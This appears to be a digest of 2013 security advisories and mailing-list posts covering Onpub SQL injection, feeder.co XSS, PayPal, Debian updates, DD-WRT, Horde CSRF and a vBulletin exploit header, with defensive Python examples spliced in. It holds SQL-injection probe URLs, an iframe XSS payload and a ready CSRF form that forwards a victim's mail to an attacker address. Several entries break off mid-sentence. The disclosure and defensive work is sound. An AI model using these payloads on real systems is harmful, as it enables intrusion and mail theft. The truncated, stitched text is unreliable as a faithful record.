Onpub CMS 1.4 1.5 - Multiple SQL Injection Vulnerabilities
Document Title:
===============
Onpub CMS 1.4 1.5 - Multiple SQL Injection Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1120

Release Date:
=============
2013-10-26

Vulnerability Laboratory ID (VL-ID):
====================================
1120

Common Vulnerability Scoring System:
====================================
8.2

Product & Service Introduction:
===============================
Onpub is a web content management system (CMS) designed for those with intermediate to advanced web development skills
looking to quickly set up custom, dynamic websites that are quick to update and easy to maintain. All Onpub content is
stored in a fast and reliable MySQL database backend. There are many ways to customize and extend Onpub's default design
and functionality via open-standard web development tools and techniques. Onpub is ideal for those with no desire to
implement a CMS from scratch, but still need a custom, yet agile solution. Onpub tightly integrates many widely used
third-party web apps and scripts into one coherent system to build further upon.

(Copy of the Vendor Homepage: http://onpub.com/ )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple remote web vulnerabilities in the Onpub v1.5 Content
Management System web-application.

Vulnerability Disclosure Timeline:
==================================
2013-10-26: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Onpub
Product: Onpub - Content Management System 1.4 Lite and 1.5

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
1.1
Multiple remote sql injection web vulnerabilities are detected in the official Onpub v1.4 and 1.5 Content Management
System web-application. The vulnerability allows remote attackers to inject their own sql commands without authorization
to compromise the web-application or the web-server dbms.

The sql injection vulnerabilities are located in the `websiteID`, `imageID`, `keywords`, `orderBy`, `order` and
`articleID` values of the index.php file. Remote attackers are able to inject their own sql commands via a GET method
request to compromise the database management system or cms web-application. The injection can be done by using the
manage path via a GET method request or by using the articleID in the index.php file via a POST method request.
The severity of the remote sql injection bugs is estimated as critical.

Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application
user account. Successful exploitation of the remote sql injection bug results in database management system and cms or
web-application compromise.

Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] websiteID
[+] imageID
[+] keywords
[+] orderBy
[+] order
[+] articleID

2.1
A client-side post injection web vulnerability is detected in the official Onpub v1.4 and v1.5 Content Management System
web-application. The vulnerability allows remote attackers to manipulate web-application to browser requests via the
POST method (client-side).

The client-side cross site scripting web vulnerability is located in the vulnerable `page` parameter of the index.php
file (manage module). Remote attackers can manipulate the `page` parameter in the `index.php` file via a GET method
request to compromise the client-side application context.

Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking,
client-side phishing, client-side unauthorized external redirects and client-side manipulation of the contact form
module context.

Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] page

Proof of Concept (PoC):
=======================
1.1
The sql injection web vulnerabilities can be exploited by remote attackers without a privileged application user
account and without user interaction. For demonstration or to reproduce ...

PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsite&websiteID=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&fullTextSearch=1&keywords=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsites&orderBy=-1%27[SQL-INJECTION
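The advisory names `websiteID`, `orderBy` and `order` among the injectable values but does not show the query code. The following is an added example, not Onpub's code or the advisory's, that contrasts the string-concatenation pattern behind such a finding with a hardened version: numeric IDs are type-checked and bound as parameters, while identifiers such as the sort column and direction, which cannot be bound, are checked against an allow-list. It runs against an in-memory SQLite table constructed here; the table name `websites` and its columns are assumptions, not Onpub's schema.

```python
"""Added example (not Onpub's code): query building from the websiteID /
orderBy / order parameters, first by concatenation and then hardened.
Runs on an in-memory SQLite table constructed here; the table name and
columns are assumptions, not Onpub's schema."""
import sqlite3

ORDERABLE_COLUMNS = {"id", "name", "created"}   # assumed columns of the demo table
ORDER_DIRECTIONS = {"ASC", "DESC"}


def make_db():
    """Constructed sample data standing in for a CMS 'websites' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE websites (id INTEGER PRIMARY KEY, name TEXT, created TEXT)")
    conn.executemany("INSERT INTO websites VALUES (?, ?, ?)",
                     [(1, "main", "2013-01-01"), (2, "blog", "2013-02-01")])
    return conn


def vulnerable_lookup(conn, website_id):
    """Concatenation: the raw request parameter becomes part of the SQL text."""
    sql = "SELECT id, name FROM websites WHERE id = " + website_id
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, website_id):
    """Type-check first, then bind; a bound value can never alter the query structure."""
    try:
        wid = int(website_id)
    except ValueError:
        raise ValueError("websiteID must be an integer") from None
    return conn.execute("SELECT id, name FROM websites WHERE id = ?", (wid,)).fetchall()


def hardened_list(conn, order_by, order):
    """Column names and ASC/DESC cannot be bound as parameters, so allow-list them."""
    direction = order.upper()
    if order_by not in ORDERABLE_COLUMNS or direction not in ORDER_DIRECTIONS:
        raise ValueError("orderBy/order not in allow-list")
    sql = f"SELECT id, name FROM websites ORDER BY {order_by} {direction}"
    return [row[1] for row in conn.execute(sql)]


def probe(conn, website_id):
    """Outcome of one websiteID value against both implementations:
    'ok', 'sql-error' (the query text was altered) or 'rejected' (validation)."""
    outcome = {}
    for label, fn in (("vulnerable", vulnerable_lookup), ("hardened", hardened_lookup)):
        try:
            fn(conn, website_id)
            outcome[label] = "ok"
        except sqlite3.OperationalError:
            outcome[label] = "sql-error"
        except ValueError:
            outcome[label] = "rejected"
    return outcome


if __name__ == "__main__":
    db = make_db()
    print(probe(db, "1"))                  # both implementations answer normally
    print(probe(db, "-1'"))                # the advisory's probe: only the concatenated query breaks
    print(len(vulnerable_lookup(db, "1 OR 1=1")), "rows from the concatenated query")
    print(hardened_list(db, "name", "asc"))
```

The `probe` helper is what a reviewer can run over each request parameter: the `-1'` value from the advisory turns into a database error only on the concatenated path, which is the same signal that made the parameters detectable in the first place, while the hardened path refuses it before any SQL is built.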
Feeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability
Document Title:
===============
Feeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability

Release Date:
=============
2013-10-26

Vulnerability Laboratory ID (VL-ID):
====================================
1119

Common Vulnerability Scoring System:
====================================
3.8

Product & Service Introduction:
===============================
Feeder.co (www.feeder.co) is the simplest and prettiest way to follow your favorite feeds and sites. Feeder supports
most RSS and Atom feeds on the web. Get a simple overview of your RSS and Atom feeds in the toolbar. A simple and pretty
way of keeping track of your latest RSS and Atom feeds. The best RSS Feed Reader extension for Chrome.

- Instantaneously see when new posts are added to one of your RSS and Atom feeds
- Easily subscribe to new RSS/Atom feeds by clicking the browser icon
- Intuitively manage your feeds
- Right click context-menus in popup-menu let you mark all as read, and other nifty shortcuts
- Export your feeds so you can import them on another computer and/or keep them as backups for safekeeping
- Customize your feeds by choosing how many posts to display, or changing the title
- Organize your feeds using folders and sorting with drag and drop
- Choose between three different themes: Dark, Mint or Light
- Everything is contained within the browser so no other third-party sites are needed
- Notifications when feeds have been updated. Enable globally or on select feeds
- Supports both RSS and Atom feeds
- See when a page has any RSS or Atom feeds to subscribe to

(Copy of the Vendor Product Homepage: http://feeder.co )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the Feeder.co RSS Feeds Chrome
Addon.

Vulnerability Disclosure Timeline:
==================================
2013-10-26: Researcher Notification & Coordination (Ateeq Khan)

Discovery Status:
=================
Published

Affected Product(s):
====================
Feeder.co
Product: RSS Feeder - Chrome Browser Addon 5.2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A remote script code execution vulnerability has been detected in the official feeder.co RSS browser extension
application. The vulnerability allows remote attackers to manipulate web-application to browser requests via the POST
method (persistent).

The vulnerability affects the main feed input field and, since the application is not performing input sanitization
properly, it is possible to inject persistent script code within the affected folder name input field, which then
directly gets executed when the victim tries to delete the malicious entry. It is possible to inject malicious script
code in the folder `Name` field parameter of the feeds while adding a new entry. The code execution happens when a user
tries to delete the injected entries. The affected source code with the injected payload is given below for your
reference:

<div class="pui-confirm-text">Delete "<iframe onload="prompt(2)" src="http://evolution-sec.com">script?</iframe></div>

It is also possible to inject malicious code through a remote URL simply by adding new RSS feeds from a third-party
remote website. In this case, the `Title` parameter is vulnerable. It is also possible to import/export the RSS feeds
through a file, which makes this attack vector remotely exploitable through this method as well.

This vulnerability affects all current feeder.co users who are using the RSS browser extension application for PC.
iOS and Android users may also be affected by this vulnerability.

Successful exploitation of the persistent cross site scripting web vulnerability results in persistent client-side
phishing, persistent client-side unauthorized external redirects and persistent manipulation of the module context.

Vulnerable Module(s):
[+] RSS Feeds

Vulnerable Section(s):
[+] Add Feed (Title parameter)
[+] Add Folder Name (Name parameter)

Proof of Concept (PoC):
=======================
The persistent script code execution vulnerability can be exploited by remote attackers without a web-application user
account and with medium user interaction. For demonstration or to reproduce ...

To reproduce the proof of concept, the researcher used multiple ways, including importing feeds from a remote URL and
adding payloads manually.

Including payloads from a remote URL:

1. Add a new feed entry in the browser extension with the following POC URL
   https://groups.google.com/forum/feed/evosec/msgs/rss.xml?num=15
2. You should now see the injected entries in your feeds.
3. Try to delete the newly included entry feed
4. You should see the code being
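The root cause described above is a feed-supplied title being written into the extension's confirmation dialog without output encoding. The following is an added example, not feeder.co's code, that parses a constructed RSS document and renders each title into the same `pui-confirm-text` wrapper the advisory shows, once verbatim and once HTML-encoded. The feed content, the `example.invalid` URLs and the helper names are constructed here; only the wrapper markup mirrors the advisory.

```python
"""Added example (not feeder.co's code): entry titles from a constructed RSS
feed rendered into the delete-confirmation markup with and without output
encoding. Feed content, URLs and helper names are constructed here."""
import html
import re
import xml.etree.ElementTree as ET

# Constructed feed: the second item's <title> carries markup, which is how the
# advisory describes feeds subscribed from a third-party site.
SAMPLE_RSS = """<rss version="2.0"><channel><title>demo feed</title>
<item><title>Plain post</title><link>http://example.invalid/1</link></item>
<item><title>&lt;iframe onload="prompt(2)" src="http://example.invalid/"&gt;x&lt;/iframe&gt;</title>
<link>http://example.invalid/2</link></item>
</channel></rss>"""


def feed_titles(rss_text):
    """Entry titles as the feed delivers them; the XML parser has already
    decoded the entities, so the second title is literal HTML."""
    root = ET.fromstring(rss_text)
    return [item.findtext("title") or "" for item in root.iter("item")]


def render_confirm_unsafe(title):
    """Interpolates the feed-controlled title straight into the dialog's HTML."""
    return f'<div class="pui-confirm-text">Delete "{title}"?</div>'


def render_confirm_safe(title):
    """html.escape(quote=True) turns < > & \" ' into entities, so the title is
    shown as text whether it lands in element content or in an attribute."""
    return f'<div class="pui-confirm-text">Delete "{html.escape(title, quote=True)}"?</div>'


def injected_tags(rendered):
    """Tag names in the fragment other than the wrapping div; an empty list
    means the title could not introduce markup."""
    found = re.findall(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)", rendered)
    return [t for t in found if t.lower() != "div"]


if __name__ == "__main__":
    for title in feed_titles(SAMPLE_RSS):
        print("unsafe:", injected_tags(render_confirm_unsafe(title)))
        print("safe:  ", injected_tags(render_confirm_safe(title)))
```

In the extension itself the equivalent fix is to assign the title through `textContent` (or an escaping template helper) rather than building an HTML string; the encoding step is the same, it just happens in the browser.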
Paypal Inc Bug Bounty #104 - Persistent Exception Vulnerability
Document Title:
===============
Paypal Inc Bug Bounty #104 - Persistent Exception Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1038

PayPal Security UID: gJ1127yy

Release Date:
=============
2013-10-26

Vulnerability Laboratory ID (VL-ID):
====================================
1038

Common Vulnerability Scoring System:
====================================
4.3

Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online
money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money
orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at
the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the
account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a
purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as
Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is
set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to
charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal
Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can
bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a
PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer
to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for
which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees
depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the
amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur
extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose,
California, United States at eBay's North First Street satellite office campus. The company also has significant
operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin,
Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow
Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of
the year 2010. Between December 4–9, 2010, PayPal services were attacked in a series of denial-of-service attacks
organized by Anonymous in retaliation for PayPal's decision to freeze the account of WikiLeaks citing terms of use
violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official
PayPal Inc (Core API) Shipping Application.

Vulnerability Disclosure Timeline:
==================================
2013-07-31: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-08-01: Vendor Notification (PayPal Site Security Team - Bug Bounty Program)
2013-09-26: Vendor Response/Feedback (PayPal Site Security Team - Bug Bounty Program)
2013-10-25: Vendor Fix/Patch (PayPal Site Developer Team)
2013-10-26: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
PayPal Inc
Product: Shipping MOS Application - API 2013 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent input validation web vulnerability is detected in the official PayPal Inc (Core API) Shipping Web
Application. The vulnerability allows remote attackers to inject their own malicious script code on the application side
with a persistent attack vector.

The vulnerability is located in the service unavailable exception of the Get Started with paypal module. Remote
attackers can request the Get Started service with an
[SECURITY] [DSA 2785-1] chromium-browser security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2785-1                   secur...@debian.org
http://www.debian.org/security/                           Michael Gilbert
October 26, 2013                       http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : chromium-browser
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-2906 CVE-2013-2907 CVE-2013-2908 CVE-2013-2909 CVE-2013-2910
                 CVE-2013-2911 CVE-2013-2912 CVE-2013-2913 CVE-2013-2915 CVE-2013-2916
                 CVE-2013-2917 CVE-2013-2918 CVE-2013-2919 CVE-2013-2920 CVE-2013-2921
                 CVE-2013-2922 CVE-2013-2923 CVE-2013-2924 CVE-2013-2925 CVE-2013-2926
                 CVE-2013-2927 CVE-2013-2928

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2013-2906
    Atte Kettunen of OUSPG discovered race conditions in Web Audio.

CVE-2013-2907
    Boris Zbarsky discovered an out-of-bounds read in window.prototype.

CVE-2013-2908
    Chamal de Silva discovered an address bar spoofing issue.

CVE-2013-2909
    Atte Kettunen of OUSPG discovered a use-after-free issue in inline-block.

CVE-2013-2910
    Byoungyoung Lee of the Georgia Tech Information Security Center discovered a use-after-free issue in Web Audio.

CVE-2013-2911
    Atte Kettunen of OUSPG discovered a use-after-free in Blink's XSLT handling.

CVE-2013-2912
    Chamal de Silva and 41.w4r10r(at)garage4hackers.com discovered a use-after-free issue in the Pepper Plug-in API.

CVE-2013-2913
    cloudfuzzer discovered a use-after-free issue in Blink's XML document parsing.

CVE-2013-2915
    Wander Groeneveld discovered an address bar spoofing issue.

CVE-2013-2916
    Masato Kinugawa discovered an address bar spoofing issue.

CVE-2013-2917
    Byoungyoung Lee and Tielei Wang discovered an out-of-bounds read issue in Web Audio.

CVE-2013-2918
    Byoungyoung Lee discovered an out-of-bounds read in Blink's DOM implementation.

CVE-2013-2919
    Adam Haile of Concrete Data discovered a memory corruption issue in the V8 javascript library.

CVE-2013-2920
    Atte Kettunen of OUSPG discovered an out-of-bounds read in URL host resolving.

CVE-2013-2921
    Byoungyoung Lee and Tielei Wang discovered a use-after-free issue in resource loading.

CVE-2013-2922
    Jon Butler discovered a use-after-free issue in Blink's HTML template element implementation.

CVE-2013-2924
    A use-after-free issue was discovered in the International Components for Unicode (ICU) library.

CVE-2013-2925
    Atte Kettunen of OUSPG discovered a use-after-free issue in Blink's XML HTTP request implementation.

CVE-2013-2926
    cloudfuzzer discovered a use-after-free issue in the list indenting implementation.

CVE-2013-2927
    cloudfuzzer discovered a use-after-free issue in the HTML form submission implementation.

CVE-2013-2923 and CVE-2013-2928
    The chrome 30 development team found various issues from internal fuzzing, audits, and other studies.

For the stable distribution (wheezy), these problems have been fixed in version 30.0.1599.101-1~deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in version 30.0.1599.101-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked
questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[SECURITY] [DSA 2787-1] roundcube security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2787-1                   secur...@debian.org
http://www.debian.org/security/                       Salvatore Bonaccorso
October 27, 2013                       http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : roundcube
Vulnerability  : design error
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-6172
Debian Bug     : 727668

It was discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, does not properly sanitize
the _session parameter in steps/utils/save_pref.inc during saving preferences. The vulnerability can be exploited to
overwrite configuration settings and subsequently allowing random file access, manipulated SQL queries and even code
execution.

roundcube in the oldstable distribution (squeeze) is not affected by this problem.

For the stable distribution (wheezy), this problem has been fixed in version 0.7.2-9+deb7u1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your roundcube packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked
questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Call for Papers, 2014 Symposium on Cryptography and Authentication (SCA2014) , Suzhou, China
Call for Papers
2014 Symposium on Cryptography and Authentication (SCA2014)

Submission Due: Nov. 27, 2013
Conference: March 10-12, 2014

Dear Colleagues,

We would like to cordially invite you to submit or recommend papers to the 2014 Symposium on Cryptography and
Authentication (SCA2014)! This conference will be held from March 10 to 12, 2014 in Suzhou, China. The conference will
bring together leading researchers, engineers and scientists in the domain of interest from around the world. More
detailed information can be found at www.engii.org/workshop/CIS2014March.

Related Topics (more can be found on our website)
• Anti-Virus and Anti-Worms
• Key Management and Key Recovery
• Database Security
• Language-based Security
• Distributed Systems Security
• Security Evaluation
• Electronic Commerce Security
• Security for Mobile Computing
• Fraud Control
• Security Models
• Information Security Engineering
• System Security
• Information Privacy
• Signature and Key Agreement Protocol

Technical Program Committee
Prof. Fagen Li, University of Electronic Science and Technology of China
Prof. Xiaochun Cheng, Middlesex University
Prof. Vic Grout, Glyndwr University
Prof. Giannis F. Marias, Athens University of Economics and Business
Prof. Stavros D. Nikolopoulos, University of Ioannina
More

Publication and Presentation
All the accepted papers will be published by Journal of Computer and Communications (ISSN:2327-5219), a peer-reviewed
open access journal that can ensure the widest dissemination of your published work. If you want to present your
research results but do NOT wish to publish a paper, you may simply submit an Abstract to our Registration System.

Yours sincerely,
SCA Organizing Committee
Email: c...@engii.org
Tel: +86- 132 6470 2230
[CVE-2012-6297] DD-WRT v24-sp2 Command Injection
Unfortunately command injections like the NETGEAR one Zachary Cutlip and I both came across are all too common in embedded systems. Similar to NETGEAR and Linksys having commands injected when running ping, I have also noticed that DD-WRT v24-sp2 is prone to command injection from specially crafted configuration values containing shell meta-characters. A remote attacker can potentially use CSRF from an authenticated client to remotely execute commands on the router as the root user. This is also an easy way to DoS a system since you could potentially force it into a reboot loop.

I reported this in the project's bug tracker almost a year ago but it doesn't look like this is actively maintained, so I figured I may as well share it with the list now in case anyone is running this firmware. This is tracked as CVE-2012-6297.

There are a lot of consumer routers with these types of issues (working with several vendors on this stuff at the moment), so I have provided this list of generic tips for keeping consumer/SOHO routers secure: http://www.tripwire.com/state-of-security/vulnerability-management/five-tips-securing-soho-routers/

I would also love to hear what other suggestions people have towards minimizing the risk of someone popping a shell on your router.

Regards,
Craig
http://secur3.us/pub_key.asc
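The post describes the general failure mode (a stored configuration value containing shell metacharacters reaching a shell) without showing firmware code. The following is an added example, not DD-WRT's code or Craig's, that shows that failure mode and the two defences firmware should combine: allow-list validation of the value when it is stored, and executing the eventual command without a shell so the value is a single argv element. The `hostname` setting, the use of `echo` as a stand-in for the real command and the helper names are assumptions made here for illustration.

```python
"""Added example (not DD-WRT code): a configuration value that would later be
handed to a shell, handled unsafely and then safely. The 'hostname' setting,
the 'echo' stand-in command and the helper names are assumptions."""
import re
import subprocess

# RFC 1123-style host label: letters, digits and inner hyphens only, max 63 chars.
HOST_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def validate_hostname(value):
    """Allow-list validation at store time: reject anything but a plain host label."""
    if not HOST_LABEL.fullmatch(value):
        raise ValueError(f"rejected config value: {value!r}")
    return value


def run_unsafe(value):
    """The pattern the post describes: the stored value is pasted into a command
    string that /bin/sh parses, so every metacharacter in it is interpreted."""
    proc = subprocess.run(f"echo {value}", shell=True, capture_output=True, text=True)
    return proc.stdout.splitlines()


def run_safe(value):
    """Validate, then pass the value as one argv element with no shell involved."""
    proc = subprocess.run(["echo", validate_hostname(value)],
                          capture_output=True, text=True, check=True)
    return proc.stdout.splitlines()


def apply_setting(value):
    """A hardened config handler: ('applied', output) or ('rejected', reason)."""
    try:
        return ("applied", run_safe(value))
    except ValueError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    crafted = "router; echo INJECTED"     # constructed value carrying a shell metacharacter
    print(run_unsafe(crafted))             # two commands ran: ['router', 'INJECTED']
    print(apply_setting(crafted))          # ('rejected', ...)
    print(apply_setting("my-router"))      # ('applied', ['my-router'])
```

The argv form alone already stops the injection; the validation step is still worth keeping because the same value is usually written into NVRAM and later consumed by shell scripts the firmware ships, where no argv boundary exists.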
Call for Papers, 2014 Symposium on Protocols and Rules for Security (SPRS2014)
2014 Symposium on Protocols and Rules for Security (SPRS2014)
Call for Papers

Dear Colleagues,

We would like to cordially invite you to submit or recommend papers to the 2014 Symposium on Protocols and Rules for
Security (SPRS2014)! This conference will be held from March 10 to 12, 2014 in Suzhou, China. The conference will bring
together leading researchers, engineers and scientists in the domain of interest from around the world. More detailed
information can be found at www.engii.org/workshop/CIS2014March.

Topics
• Access Control
• Anti-Virus and Anti-Worms
• Authentication and Authorization
• Biometric Security
• Cryptography
• Data and System Integrity
• Database Security
• Distributed Systems Security
• Electronic Commerce Security
• Intrusion Detection
• Key Management and Key Recovery
• Language-based Security
• Network Security
• Operating System Security
• Risk Evaluation and Security Certification
• Security Evaluation
• Security for Mobile Computing

Important Dates
Submission Due: Nov. 27, 2013
Conference: March 10-12, 2014

Technical Program Committee
Prof. Fagen Li, University of Electronic Science and Technology of China
Prof. Xiaochun Cheng, Middlesex University
Prof. Vic Grout, Glyndwr University
Prof. Giannis F. Marias, Athens University of Economics and Business
Prof. Stavros D. Nikolopoulos, University of Ioannina
More

Publication and Presentation
All the accepted papers will be published by Journal of Computer and Communications (ISSN:2327-5219), a peer-reviewed
open access journal that can ensure the widest dissemination of your published work. To be considered for an oral
presentation, you can also submit your abstract to our submission system.

Contact Us
Email: c...@engii.org
Tel: +86- 132 6470 2230
[SECURITY] [DSA 2786-1] icu security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2786-1                   secur...@debian.org
http://www.debian.org/security/                           Michael Gilbert
October 27, 2013                       http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : icu
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-0900 CVE-2013-2924
Debian Bug     : 702346 726477

The Google Chrome Security Team discovered two issues (a race condition and a use-after-free issue) in the International
Components for Unicode (ICU) library.

For the oldstable distribution (squeeze), these problems have been fixed in version 4.4.1-8+squeeze2.

For the stable distribution (wheezy), which is only affected by CVE-2013-2924, this problem has been fixed in version
4.8.1.1-12+deb7u1.

For the testing distribution (jessie), which is only affected by CVE-2013-2924, this problem will be fixed soon.

For the unstable distribution (sid), which is only affected by CVE-2013-2924, this problem has been fixed in version
4.8.1.1-13+nmu1.

We recommend that you upgrade your icu packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked
questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Multiple CSRF Horde Groupware Web mail Edition 5.1.2
# Exploit Title: Multiple CSRF Horde Groupware Web mail Edition
Author: Marcela Benetrix
Date: 10/25/13
Version: 5.1.2
Software link: http://www.horde.org/apps/webmail

# GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and
organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards
compliant components from the Horde Project.

## CSRF Location

Several functionalities from the Rules section were found to be missing the token that prevents CSRF.

## POC

    <html>
    <body>
    <form action="./horde/ingo/basic.php?page=rule" method="POST">
    <input type="hidden" name="actionID" value="rule&#95;save" />
    <input type="hidden" name="conditionnumber" value="&#45;1" />
    <input type="hidden" name="name" value="TestingCSRF" />
    <input type="hidden" name="combine" value="1" />
    <input type="hidden" name="field&#91;0&#93;" value="From" />
    <input type="hidden" name="match&#91;0&#93;" value="contains" />
    <input type="hidden" name="value&#91;0&#93;" value="test@hotmail&#46;com" />
    <input type="hidden" name="field&#91;1&#93;" value="" />
    <input type="hidden" name="action" value="4" />
    <input type="hidden" name="actionvalue" value="attacker&#64;hotmail&#46;com" />
    <input type="hidden" name="stop" value="1" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

These were found at:

* Creating a rule
* Updating
* Enabling (http://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=2&actionID=rule_enable)
* Deleting (url-based: https://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=6&actionID=rule_delete)

### CVE identifier

CVE-2013-6275.

## Vendor Notification

10/25/2013 to: the developers. They replied immediately and fixed the problem launching a patch:
http://bugs.horde.org/ticket/12796

10/28/2013: Disclosure
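The advisory's PoC works because the rule save, enable and delete requests carry nothing that a cross-site page could not forge. The following is an added example, not Horde's code or the advisory author's, of the synchronizer-token check that closes this: the token is an HMAC over the session id, so the server stores no extra state, the genuine form embeds it, and any request lacking a matching token is refused. It also rejects the GET-reachable enable/delete actions unless they arrive as a POST with the token. The secret, the session ids, the field names and the status codes are constructed here.

```python
"""Added example (not Horde's code): a session-bound synchronizer token for
the rule save/enable/delete requests the advisory lists. Secret, session ids,
field names and status codes are constructed here."""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # per-deployment key, generated here for the demo


def csrf_token(session_id, secret=SERVER_SECRET):
    """Token bound to one session: HMAC-SHA256(secret, session_id), hex encoded."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def render_rule_form(session_id):
    """Hidden field the genuine form carries; a cross-site page cannot produce
    it because it does not know the victim's session id or the server secret."""
    return f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}" />'


def handle_rule_save(session_id, form):
    """Server-side check before the rule is stored: the token must be present
    and equal (constant-time compare) to the one derived for this session."""
    submitted = form.get("csrf_token", "")
    if not submitted:
        return (403, "missing CSRF token")
    if not hmac.compare_digest(submitted.encode(), csrf_token(session_id).encode()):
        return (403, "invalid CSRF token")
    return (200, f"rule {form.get('name')!r} saved")


def handle_rule_action(session_id, method, params):
    """rule_enable / rule_delete were reachable by plain GET links; state
    changes are accepted only as POSTs that pass the same token check."""
    if method != "POST":
        return (405, "state-changing actions must be POSTed")
    return handle_rule_save(session_id, params)


if __name__ == "__main__":
    sid = "sess-victim"                       # constructed session id
    print(render_rule_form(sid))
    print(handle_rule_save(sid, {"name": "TestingCSRF"}))                 # the PoC form: no token
    print(handle_rule_save(sid, {"name": "TestingCSRF", "csrf_token": csrf_token(sid)}))
    print(handle_rule_action(sid, "GET", {"csrf_token": csrf_token(sid)}))
```

A random per-session token stored server-side works just as well; the HMAC derivation is used here only so the example needs no session store. Either way the comparison must be constant-time and the token must be required on every state-changing route, including the enable and delete links.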
vBulletin remote admin injection exploit
#!/usr/bin/perl
#
# Title: vBulletin remote admin injection exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 17 September 2013
# Published: 24 October 2013
# MorXploit Research
# http://www.MorXploit.com
#
# Vendor: vBulletin (www.vbulletin.com)
# Version: 4.1.x / 5.x.x
# Vulnerability: Remote admin injection
# Severity: High
# Status: Confirmed
#
# Exploit code description:
# Perl code to inject a new admin account through the upgrade.php script.
#
# Vulnerability details:
# upgrade.php is vulnerable to new admin account injection: the script doesn't require authentication when upgrading,
# it only requires the customer number, which can be extracted from the same script's page source.
#
# Fix:
